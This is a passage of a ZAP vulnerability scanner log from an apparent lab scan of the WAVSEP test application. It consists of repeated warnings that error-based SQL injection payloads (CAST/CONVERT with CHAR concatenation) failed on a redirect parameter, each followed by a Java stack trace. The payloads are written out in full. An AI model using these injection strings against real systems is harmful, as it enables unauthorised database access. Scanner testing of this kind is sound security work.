org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681645 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 5850=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5850=5850) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 5850=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5850=5850) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681647 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 5452=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5452=5452) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- VNSM] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 5452=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5452=5452) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- VNSM at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681647 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) AND 8561=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8561=8561) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (3781=3781] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) AND 8561=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8561=8561) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (3781=3781 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681648 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com AND 4137=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4137=4137) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com AND 4137=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4137=4137) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681649 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 8264=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8264=8264) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (7324=7324] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 8264=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8264=8264) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (7324=7324 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681650 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') AND 5066=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5066=5066) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('IMXU'='IMXU] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') AND 5066=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5066=5066) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('IMXU'='IMXU at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681650 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 7405=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7405=7405) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 7405=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7405=7405) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681651 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' AND 9204=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (9204=9204) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'Hrbh'='Hrbh] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' AND 9204=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (9204=9204) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'Hrbh'='Hrbh at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681652 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 2207=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2207=2207) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('OGAC'='OGAC] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 2207=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2207=2207) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('OGAC'='OGAC at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681653 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' AND 5930=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5930=5930) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' AND 5930=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5930=5930) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681654 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 2458=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2458=2458) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'fHEO'='fHEO] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 2458=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2458=2458) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'fHEO'='fHEO at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681654 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com AND 8629=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8629=8629) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- Gbic] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com AND 8629=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8629=8629) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- Gbic at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at 